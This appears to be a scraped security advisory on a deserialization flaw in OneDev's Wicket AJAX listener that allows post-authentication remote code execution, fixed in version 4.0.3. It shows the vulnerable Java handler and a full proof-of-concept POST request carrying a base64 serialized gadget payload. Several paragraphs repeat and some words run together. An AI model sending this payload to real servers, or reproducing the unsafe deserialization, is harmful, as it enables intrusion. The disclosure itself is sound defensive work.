@Override
protected void respond(AjaxRequestTarget target) {
IRequestParameters params = RequestCycle.get().getRequest().getPostParameters();
String encodedData = params.getParameterValue("data").toString();
byte[] bytes = Base64.decodeBase64(encodedData.getBytes());
Serializable data = (Serializable) SerializationUtils.deserialize(bytes);
onPopState(target, data);
target.appendJavaScript("onedev.server.viewState.getFromHistoryAndSetToView();");
}We can access this listener by submitting a POST request to any page. e.g.
POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close
data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==
This endpoint is subject to authentication and, therefore, requires a valid user to carry on the attack.
This issue was addressed in 4.0.3 by encrypting serialization payload with secrets only known to server.
Impact
The application's
BasePageregisters an AJAX event listener (AbstractPostAjaxBehavior) in all pages other than the login page. This listener decodes and deserializes thedataquery parameter.We can access this listener by submitting a POST request to any page. e.g.
This endpoint is subject to authentication and, therefore, requires a valid user to carry on the attack.
This issue may lead to
post-auth RCEPatches
This issue was addressed in 4.0.3 by encrypting serialization payload with secrets only known to server.
Credits
This issue was discovered by @pwntester